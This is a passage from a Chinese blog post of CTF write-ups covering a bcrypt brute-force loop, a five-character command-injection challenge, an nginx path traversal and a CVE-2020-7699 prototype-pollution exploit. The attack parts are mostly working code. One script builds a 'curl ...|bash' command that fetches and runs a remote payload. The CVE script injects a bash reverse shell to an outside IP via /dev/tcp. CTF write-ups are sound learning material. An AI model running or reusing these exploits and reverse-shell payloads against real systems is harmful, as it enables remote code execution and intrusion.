class="comment">#输出信息</span></span><br><span class="line"><span class="keyword">array</span> (size=<span class="number">3</span>)</span><br><span class="line">  <span class="string">'algo'</span> =&gt; int <span class="number">1</span></span><br><span class="line">  <span class="string">'algoName'</span> =&gt; string <span class="string">'bcrypt'</span> (length=<span class="number">6</span>)</span><br><span class="line">  <span class="string">'options'</span> =&gt; </span><br><span class="line">    <span class="keyword">array</span> (size=<span class="number">1</span>)</span><br><span class="line">      <span class="string">'cost'</span> =&gt; int <span class="number">10</span></span><br><span class="line">$a = password_hash(<span class="string">'password'</span>,PASSWORD_DEFAULT,<span class="keyword">array</span>(<span class="string">'cost'</span> =&gt; <span class="number">11</span>));</span><br><span class="line"><span class="comment">//相应的cost也会变为11；</span></span><br></pre></td></tr></table></figure>
<p>接下来就是爆破，已知密码为bcrypt+4位小写字母</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> <span class="keyword">require</span> <span class="string">'vendor/autoload.php'</span>; </span><br><span class="line"><span class="keyword">use</span> <span class="title">Bcrypt</span>\<span class="title">Bcrypt</span>; </span><br><span class="line">$key = <span class="string">"abcdefghijklmnopqrstuvwxyz"</span>; </span><br><span class="line">$bcrypt = <span class="keyword">new</span> Bcrypt(); </span><br><span class="line">$plaintext = <span class="string">'bcrypt'</span>;<span class="comment">//bcryptyyds </span></span><br><span class="line">$ciphertext = <span class="string">'$2y$10$RBfi8QpJJQQmJD6FylurJeqmP.6cMn7tdoKczL2v9hScd9zDj3wXe'</span>; </span><br><span class="line"><span class="keyword">for</span>($i=<span class="number">0</span>;$i&lt;<span class="number">26</span>;$i++) &#123; </span><br><span class="line">    <span class="keyword">for</span>($j=<span class="number">0</span>;$j&lt;<span class="number">26</span>;$j++) &#123; </span><br><span class="line">        <span class="keyword">for</span>($k=<span class="number">0</span>;$k&lt;<span class="number">26</span>;$k++) &#123; </span><br><span class="line">            <span class="keyword">for</span>($m=<span class="number">0</span>;$m&lt;<span class="number">26</span>;$m++) &#123; </span><br><span class="line">                <span class="keyword">echo</span> $plaintext.$str.PHP_EOL; </span><br><span class="line">                $str = $key[$i].$key[$j].$key[$k].$key[$m]; </span><br><span class="line">                <span class="keyword">if</span>($bcrypt-&gt;verify($plaintext.$str, $ciphertext))&#123; </span><br><span class="line">                    <span class="keyword">echo</span>(<span class="string">"&lt;/br&gt;Password verified!&lt;/br&gt;"</span>); </span><br><span class="line">                    <span class="keyword">echo</span>(<span class="string">"Wow!!Now,hack it!&lt;/br&gt;"</span>); </span><br><span class="line">                &#125; </span><br><span class="line">            &#125; </span><br><span class="line">        &#125; </span><br><span class="line">    &#125; </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<h3 id="命令执行"><a href="#命令执行" class="headerlink" title="命令执行"></a>命令执行</h3><p>最终的考点就是命令执行可以参考hitcon-ctf-2017</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> 😁😁<span class="params">()</span> </span>&#123;</span><br><span class="line">	<span class="keyword">global</span> $🏁,$strlen,$chr,$base64_decode,$isset;</span><br><span class="line">	$path = <span class="string">"/var/www/html/sandbox/"</span>.md5($_SERVER[<span class="string">'REMOTE_ADDR'</span>]);</span><br><span class="line">	mkdir($path);</span><br><span class="line">	chdir($path);</span><br><span class="line">	<span class="keyword">if</span> (<span class="keyword">isset</span>($_GET[<span class="string">'cmd'</span>]) &amp;&amp; strlen($_GET[<span class="string">'cmd'</span>]) &lt;= <span class="number">5</span>) &#123;</span><br><span class="line">		@exec($_GET[<span class="string">'cmd'</span>]);</span><br><span class="line">		<span class="comment">//</span></span><br><span class="line">	&#125; <span class="keyword">else</span> <span class="keyword">if</span> (<span class="keyword">isset</span>($_GET[<span class="string">'reset'</span>])) &#123;</span><br><span class="line">		@exec(<span class="string">"rm -rf"</span> . $path);</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>这道题大概意思就是存在命令执行，但单次输入字符不得大于5。因此利用linux下特有的命令来写入shell反弹。原理就是利用curl ip|bash等很多方式去反弹shell。顺便也复习了反弹shell的一些基本操作</p>
<p>官方的脚本</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> urllib</span><br><span class="line"><span class="keyword">from</span> time <span class="keyword">import</span> sleep</span><br><span class="line">url = <span class="string">"http://219.219.61.234:10048/?cmd="</span></span><br><span class="line">payload = [</span><br><span class="line">    <span class="comment"># generate "g&gt; ht- sl" to file "v"</span></span><br><span class="line">    <span class="string">'&gt;dir'</span>,</span><br><span class="line">    <span class="string">'&gt;sl'</span>,</span><br><span class="line">    <span class="string">'&gt;g\&gt;'</span>,</span><br><span class="line">    <span class="string">'&gt;ht-'</span>,</span><br><span class="line">    <span class="string">'*&gt;v'</span>,</span><br><span class="line">    <span class="comment"># reverse file "v" to file "x", content "ls -th &gt;g" '</span></span><br><span class="line">    <span class="string">'&gt;rev'</span>,</span><br><span class="line">    <span class="string">'*v&gt;x'</span>,</span><br><span class="line">    <span class="comment"># generate "curl 0X2761697D|bash"</span></span><br><span class="line">    <span class="string">'&gt;sh '</span>,</span><br><span class="line">    <span class="string">'&gt;ba\\'</span>,</span><br><span class="line">    <span class="string">'&gt;\|\\'</span>,</span><br><span class="line">    <span class="string">'&gt;\\'</span>,</span><br><span class="line">    <span class="string">'&gt;7D\\'</span>,</span><br><span class="line">    <span class="string">'&gt;69\\'</span>,</span><br><span class="line">    <span class="string">'&gt;61\\'</span>,</span><br><span class="line">    <span class="string">'&gt;27\\'</span>,</span><br><span class="line">    <span class="string">'&gt;0X\\'</span>,</span><br><span class="line">    <span class="string">'&gt;\ \\'</span>,</span><br><span class="line">    <span class="string">'&gt;rl\\'</span>,</span><br><span class="line">    <span class="string">'&gt;cu\\'</span>,</span><br><span class="line">    <span class="comment"># got shell</span></span><br><span class="line">    <span class="string">'sh x'</span>,</span><br><span class="line">    <span class="string">'sh g'</span>,</span><br><span class="line">]</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> payload:</span><br><span class="line">    <span class="keyword">assert</span> len(i) &lt;= <span class="number">5</span></span><br><span class="line">    data = &#123; <span class="string">'passwd'</span>:<span class="string">'bcryptyyds'</span>, &#125;</span><br><span class="line">    header = &#123; <span class="string">"Content-Type"</span> : <span class="string">"application/x-www-form-urlencoded"</span>,</span><br><span class="line">               <span class="string">"Accept"</span> : <span class="string">"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,ima ge/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9"</span>,</span><br><span class="line">               <span class="string">"Upgrade-Insecure-Requests"</span> : <span class="string">"1"</span> &#125;</span><br><span class="line">    r = requests.post(url + urllib.quote(i),data=data,headers=header)</span><br><span class="line">    print(i)</span><br><span class="line">    sleep(<span class="number">0.1</span>)</span><br></pre></td></tr></table></figure>
<p>这个很郁闷，配置环境很长时间还是没能弄出来</p>
<h2 id="EZnode"><a href="#EZnode" class="headerlink" title="EZnode"></a>EZnode</h2><p>应该是国赛分区赛的题</p>
<h3 id="考点-3"><a href="#考点-3" class="headerlink" title="考点"></a>考点</h3><p>nginx反向代理配置错误</p>
<p>首先来学习一下ngnix</p>
<h3 id="ngnix"><a href="#ngnix" class="headerlink" title="ngnix"></a>ngnix</h3><p>ngnix是一款自由的、开源的、高性能的HTTP服务器和反向代理服务器。</p>
<p>主要在三个方面</p>
<ul>
<li>反向代理</li>
<li>负载均衡</li>
<li>nginx特点</li>
</ul>
<p><strong>反向代理</strong></p>
<blockquote>
<p>先说正向代理</p>
<p>客户端非常明确要访问的服务器地址；服务器只清楚请求来自哪个代理服务器，而不清楚来自哪个具体的客户端；正向代理模式屏蔽或者隐藏了真实客户端信息。</p>
</blockquote>
<p><img src="/2099/09/28/%E5%A4%8D%E7%8E%B0wp/image-20201004160128766.png" alt="image-20201004160128766"></p>
<p>上面这个图就很形象了</p>
<p>多个客户端给服务器发送的请求，nginx服务器接收到之后，</p>
<p>按照一定的规则分发给了后端的业务处理服务器进行处理了。</p>
<p>此时~请求的来源也就是客户端是明确的，但是请求具体由哪台服务器处理的并不明确了，nginx扮演的就是一个反向代理角色</p>
<p><strong>负载均衡</strong></p>
<p>在反向代理中</p>
<p>客户端会向服务端发出请求，而服务器将接受到的请求按照规则分发的过程，就叫做负载均衡</p>
<p><strong>ngnix配置</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line">main                                # 全局配置</span><br><span class="line"> </span><br><span class="line">events &#123;                            # nginx工作模式配置</span><br><span class="line"> </span><br><span class="line">&#125;</span><br><span class="line"> </span><br><span class="line">http &#123;                                # http设置</span><br><span class="line">    ....</span><br><span class="line"> </span><br><span class="line">    server &#123;                        # 服务器主机配置</span><br><span class="line">        ....</span><br><span class="line">        location &#123;                    # 路由配置</span><br><span class="line">            ....</span><br><span class="line">        &#125;</span><br><span class="line"> </span><br><span class="line">        location path &#123;</span><br><span class="line">            ....</span><br><span class="line">        &#125;</span><br><span class="line"> </span><br><span class="line">        location otherpath &#123;</span><br><span class="line">            ....</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"> </span><br><span class="line">    server &#123;</span><br><span class="line">        ....</span><br><span class="line"> </span><br><span class="line">        location &#123;</span><br><span class="line">            ....</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"> </span><br><span class="line">    upstream name &#123;                    # 负载均衡配置</span><br><span class="line">        ....</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>发现有目录穿越漏洞参考</p>
<p><a href="https://www.leavesongs.com/PENETRATION/nginx-insecure-configuration.html" target="_blank" rel="noopener">https://www.leavesongs.com/PENETRATION/nginx-insecure-configuration.html</a></p>
<p>/static../</p>
<p><img src="/2099/09/28/%E5%A4%8D%E7%8E%B0wp/image-20201004162700298.png" alt="image-20201004162700298"></p>
<p>之后就是找cve了，比较菜，只能学习</p>
<p>cve-2020-7699</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">cmd = <span class="string">'bash -c "bash -i &amp;&gt; /dev/tcp/39.97.105.125/8080 0&gt;&amp;1"'</span></span><br><span class="line"><span class="comment"># pollute</span></span><br><span class="line">r1 = requests.post(<span class="string">'http://219.219.61.234:20006/y0u_CaNn07_Gu3ss_tHe_pATh'</span>, files = &#123;<span class="string">'__proto__.outputFunctionName'</span>: (</span><br><span class="line">    <span class="literal">None</span>, <span class="string">"x;process.mainModule.require('child_process').exec('&#123;&#125;');x"</span>.format(cmd))&#125;)</span><br><span class="line">print(r1.text)</span><br><span class="line"><span class="comment"># execute command</span></span><br><span class="line">r2 = requests.get(<span class="string">'http://219.219.61.234:20006/'</span>)</span><br><span class="line">print(r2.text)</span><br></pre></td></tr></table></figure>
<p>之后反弹shell，执行命令。</p>
 
      <!-- reward -->
      
    </div>
    

    <!-- copyright -->
    
    <div class="declare">
      <ul class="post-copyright">
        <li>
          <i class="ri-copyright-line"></i>
          <strong>Copyright： </strong>
          
          Copyright is owned by the author. For commercial reprints, please contact the author for authorization. For non-commercial reprints, please indicate the source.
          
        </li>
      </ul>
    </div>
    
    <footer class="article-footer">
       
<div class="share-btn">
      <span class="share-sns share-outer">
        <i class="ri-share-forward-line"></i>
        分享
      </span>
      <div class="share-wrap">
        <i class="arrow"></i>
        <div class="share-icons">
          
          <a class="weibo share-sns" href="javascript:;" data-type="weibo">
            <i class="ri-weibo-fill"></i>
          </a>
          <a class="weixin share-sns wxFab" href="javascript:;" data-type="weixin">
            <i class="ri-wechat-fill"></i>
          </a>
          <a class="qq share-sns" href="javascript:;" data-type="qq">
            <i class="ri-qq-fill"></i>
          </a>
          <a class="douban share-sns" href="javascript:;" data-type="douban">
            <i class="ri-douban-line"></i>
          </a>
          <!-- <a class="qzone share-sns" href="javascript:;" data-type="qzone">
            <i class="icon icon-qzone"></i>
          </a> -->
          
          <a class="facebook share-sns" href="javascript:;" data-type="facebook">
            <i class="ri-facebook-circle-fill"></i>
          </a>
          <a class="twitter share-sns" href="javascript:;" data-type="twitter">
            <i class="ri-twitter-fill"></i>
          </a>
          <a class="google share-sns" href="javascript:;" data-type="google">
            <i class="ri-google-fill"></i>
          </a>
        </div>
      </div>
</div>

<div class="wx-share-modal">
    <a class="modal-close" href="javascript:;"><i class="ri-close-circle-line"></i></a>
    <p>扫一扫，分享到微信</p>
    <div class="wx-qrcode">
      <img src="//api.qrserver.com/v1/create-qr-code/?size=150x150&data=https://pz1o.top/2099/09/28/%E5%A4%8D%E7%8E%B0wp/" alt="微信分享二维码">
    </div>
</div>

<div id="share-mask"></div>  
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/CTF/" rel="tag">CTF</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/wp/" rel="tag">wp</a></li></ul>

    </footer>
  </div>

   
  <nav class="article-nav">
    
    
      <a href="/2099/09/27/Flag/" class="article-nav-link">
        <strong class="article-nav-caption">下一篇</strong>
        <div class="article-nav-title">Flag</div>
      </a>
    
  </nav>

   
<!-- valine评论 -->
<div id="vcomments-box">
  <div id="vcomments"></div>
</div>
<script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/valine@1.4.14/dist/Valine.min.js"></script>
<script>
  new Valine({
    el: "#vcomments",
    app_id: "KLWvKGPeSIyoEo4k6j3v37wy-gzGzoHsz",
    app_key: "FL93w3BBbF9lxiR8X1HI58En",
    path: window.location.pathname,
    avatar: "monsterid",
    placeholder: "给我的文章加点评论吧~",
    recordIP: true,
  });
  const infoEle = document.querySelector("#vcomments .info");
  if (infoEle && infoEle.childNodes && infoEle.childNodes.length > 0) {
    infoEle.childNodes.forEach(function (item) {
      item.parentNode.removeChild(item);
    });
  }
</script>
<style>
  #vcomments-box {
    padding: 5px 30px;
  }

  @media screen and (max-width: 800px) {
    #vcomments-box {
      padding: 5px 0px;
    }
  }

  #vcomments-box #vcomments {
    background-color: #fff;
  }

  .v .vlist .vcard .vh {
    padding-right: 20px;
  }

  .v .vlist .vcard {
    padding-left: 10px;
  }
</style>

 
     
</article>

</section>
      <footer class="footer">
  <div class="outer">
    <ul>
      <li>
        Copyrights &copy;
        2020-2021
        <i class="ri-heart-fill heart_icon"></i> pz1o
      </li>
    </ul>
    <ul>
      <li>
        
        
        
        Powered by <a href="https://hexo.io" target="_blank">Hexo</a>
        <span class="division">|</span>
        Theme - <a href="https://github.com/Shen-Yu/hexo-theme-ayer" target="_blank">Ayer</a>
        
      </li>
    </ul>
    <ul>
      <li>
        
        
        <span>
  <span><i class="ri-user-3-fill"></i>Visitors:<span id="busuanzi_value_site_uv"></span></s>
  <span class="division">|</span>
  <span><i class="ri-eye-fill"></i>Views:<span id="busuanzi_value_page_pv"></span></span>
</span>
        
      </li>
    </ul>
    <ul>
      
    </ul>
    <ul>
      
    </ul>
    <ul>
      <li>
        <!-- cnzz统计 -->
        
      </li>
    </ul>
  </div>
</footer>
      <div class="float_btns">
        <div class="totop" id="totop">
  <i class="ri-arrow-up-line"></i>
</div>

<div class="todark" id="todark">
  <i class="ri-moon-line"></i>
</div>

      </div>
    </main>
    <aside class="sidebar on">
      <button class="navbar-toggle"></button>
<nav class="navbar">
  
  <ul class="nav nav-main">
    
    <li class="nav-item">
      <a class="nav-item-link" href="/">Home</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/archives">Archive</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/tags">Tags</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/about">About</a>
    </li>
    
  </ul>
</nav>
<nav class="navbar navbar-bottom">
  <ul class="nav">
    <li class="nav-item">
      
      <a class="nav-item-link nav-item-search"  title="Search">
        <i class="ri-search-line"></i>
      </a>
      
      
      <a class="nav-item-link" target="_blank" href="/atom.xml" title="RSS Feed">
        <i class="ri-rss-line"></i>
      </a>
      
    </li>
  </ul>
</nav>
<div class="search-form-wrap">
  <div class="local-search local-search-plugin">
  <input type="search" id="local-search-input" class="local-search-input" placeholder="Search...">
  <div id="local-search-result" class="local-search-result"></div>
</div>
</div>
    </aside>
    <script>
      if (window.matchMedia("(max-width: 768px)").matches) {
        document.querySelector('.content').classList.remove('on');
        document.querySelector('.sidebar').classList.remove('on');
      }
    </script>
    <div id="mask"></div>

<!-- #reward -->
<div id="reward">
  <span class="close"><i class="ri-close-line"></i></span>
  <p class="reward-p"><i class="ri-cup-line"></i>请我喝杯咖啡吧~</p>
  <div class="reward-box">
    
    <div class="reward-item">
      <img class="reward-img" src="https://cdn.jsdelivr.net/gh/Shen-Yu/cdn/img/alipay.jpg">
      <span class="reward-type">支付宝</span>
    </div>
    
    
    <div class="reward-item">
      <img class="reward-img" src="https://cdn.jsdelivr.net/gh/Shen-Yu/cdn/img/wechat.jpg">
      <span class="reward-type">微信</span>
    </div>
    
  </div>
</div>
    
<script src="/js/jquery-2.0.3.min.js"></script>


<script src="/js/lazyload.min.js"></script>

<!-- Tocbot -->


<script src="/js/tocbot.min.js"></script>

<script>
  tocbot.init({
    tocSelector: '.tocbot',
    contentSelector: '.article-entry',
    headingSelector: 'h1, h2, h3, h4, h5, h6',
    hasInnerContainers: true,
    scrollSmooth: true,
    scrollContainer: 'main',
    positionFixedSelector: '.tocbot',
    positionFixedClass: 'is-position-fixed',
    fixedSidebarOffset: 'auto'
  });
</script>

<script src="https://cdn.jsdelivr.net/npm/jquery-modal@0.9.2/jquery.modal.min.js"></script>
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/jquery-modal@0.9.2/jquery.modal.min.css">
<script src="https://cdn.jsdelivr.net/npm/justifiedGallery@3.7.0/dist/js/jquery.justifiedGallery.min.js"></script>

<script src="/dist/main.js"></script>

<!-- ImageViewer -->

<!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">

    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>

    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">

        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>

        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">

            <div class="pswp__top-bar">

                <!--  Controls are self-explanatory. Order can be changed. -->

                <div class="pswp__counter"></div>

                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>

                <button class="pswp__button pswp__button--share" style="display:none" title="Share"></button>

                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>

                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>

                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                        <div class="pswp__preloader__cut">
                            <div class="pswp__preloader__donut"></div>
                        </div>
                    </div>
                </div>
            </div>

            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div>
            </div>

            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>

            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>

            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>

        </div>

    </div>

</div>

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.css">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/default-skin/default-skin.min.css">
<script src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe-ui-default.min.js"></script>

<script>
    function viewer_init() {
        let pswpElement = document.querySelectorAll('.pswp')[0];
        let $imgArr = document.querySelectorAll(('.article-entry img:not(.reward-img)'))

        $imgArr.forEach(($em, i) => {
            $em.onclick = () => {
                // slider展开状态
                // todo: 这样不好，后面改成状态
                if (document.querySelector('.left-col.show')) return
                let items = []
                $imgArr.forEach(($em2, i2) => {
                    let img = $em2.getAttribute('data-idx', i2)
                    let src = $em2.getAttribute('data-target') || $em2.getAttribute('src')
                    let title = $em2.getAttribute('alt')
                    // 获得原图尺寸
                    const image = new Image()
                    image.src = src
                    items.push({
                        src: src,
                        w: image.width || $em2.width,
                        h: image.height || $em2.height,
                        title: title
                    })
                })
                var gallery = new PhotoSwipe(pswpElement, PhotoSwipeUI_Default, items, {
                    index: parseInt(i)
                });
                gallery.init()
            }
        })
    }
    viewer_init()
</script>

<!-- MathJax -->

<script type="text/x-mathjax-config">
  MathJax.Hub.Config({
      tex2jax: {
          inlineMath: [ ['$','$'], ["\\(","\\)"]  ],
          processEscapes: true,
          skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
      }
  });

  MathJax.Hub.Queue(function() {
      var all = MathJax.Hub.getAllJax(), i;
      for(i=0; i < all.length; i += 1) {
          all[i].SourceElement().parentNode.className += ' has-jax';
      }
  });
</script>

<script src="https://cdn.jsdelivr.net/npm/mathjax@2.7.6/unpacked/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script>
<script>
  var ayerConfig = {
    mathjax: true
  }
</script>

<!-- Katex -->

<!-- busuanzi  -->


<script src="/js/busuanzi-2.3.pure.min.js"></script>


<!-- ClickLove -->

<!-- ClickBoom1 -->

<script src="https://cdn.jsdelivr.net/npm/animejs@latest/anime.min.js"></script>

<script src="/js/clickBoom1.js"></script>


<!-- ClickBoom2 -->

<!-- CodeCopy -->


<link rel="stylesheet" href="/css/clipboard.css">

<script src="https://cdn.jsdelivr.net/npm/clipboard@2/dist/clipboard.min.js"></script>
<script>
  function wait(callback, seconds) {
    var timelag = null;
    timelag = window.setTimeout(callback, seconds);
  }
  !function (e, t, a) {
    var initCopyCode = function(){
      var copyHtml = '';
      copyHtml += '<button class="btn-copy" data-clipboard-snippet="">';
      copyHtml += '<i class="ri-file-copy-2-line"></i><span>COPY</span>';
      copyHtml += '</button>';
      $(".highlight .code pre").before(copyHtml);
      $(".article pre code").before(copyHtml);
      var clipboard = new ClipboardJS('.btn-copy', {
        target: function(trigger) {
          return trigger.nextElementSibling;
        }
      });
      clipboard.on('success', function(e) {
        let $btn = $(e.trigger);
        $btn.addClass('copied');
        let $icon = $($btn.find('i'));
        $icon.removeClass('ri-file-copy-2-line');
        $icon.addClass('ri-checkbox-circle-line');
        let $span = $($btn.find('span'));
        $span[0].innerText = 'COPIED';
        
        wait(function () { // 等待两秒钟后恢复
          $icon.removeClass('ri-checkbox-circle-line');
          $icon.addClass('ri-file-copy-2-line');
          $span[0].innerText = 'COPY';
        }, 2000);
      });
      clipboard.on('error', function(e) {
        e.clearSelection();
        let $btn = $(e.trigger);
        $btn.addClass('copy-failed');
        let $icon = $($btn.find('i'));
        $icon.removeClass('ri-file-copy-2-line');
        $icon.addClass('ri-time-line');
        let $span = $($btn.find('span'));
        $span[0].innerText = 'COPY FAILED';
        
        wait(function () { // 等待两秒钟后恢复
          $icon.removeClass('ri-time-line');
          $icon.addClass('ri-file-copy-2-line');
          $span[0].innerText = 'COPY';
        }, 2000);
      });
    }
    initCopyCode();
  }(window, document);
</script>


<!-- CanvasBackground -->


<script src="/js/dz.js"></script>



    
    <div id="music">
    
    
    
    <iframe frameborder="no" border="1" marginwidth="0" marginheight="0" width="200" height="86"
        src="//music.163.com/outchain/player?type=2&id=22707008&auto=0&height=66"></iframe>
</div>

<style>
    #music {
        position: fixed;
        right: 15px;
        bottom: 0;
        z-index: 998;
    }
</style>
    
  </div>
<script type="text/x-mathjax-config">
    MathJax.Hub.Config({
        tex2jax: {
            inlineMath: [ ["$","$"], ["\\(","\\)"] ],
            skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code'],
            processEscapes: true
        }
    });
    MathJax.Hub.Queue(function() {
        var all = MathJax.Hub.getAllJax();
        for (var i = 0; i < all.length; ++i)
            all[i].SourceElement().parentNode.className += ' has-jax';
    });
</script>
<!-- <script src="http://cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script>-->
<script src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.1/MathJax.js?config=TeX-MML-AM_CHTML"></script>
</body>

</html>